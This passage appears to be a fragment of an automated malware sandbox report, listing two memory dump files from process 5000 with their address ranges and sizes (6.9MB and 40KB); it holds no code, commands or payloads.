                                                                                                      • memory/5000-672-0x0000000073D50000-0x000000007443E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/5000-46-0x0000000006AA0000-0x0000000006AAA000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB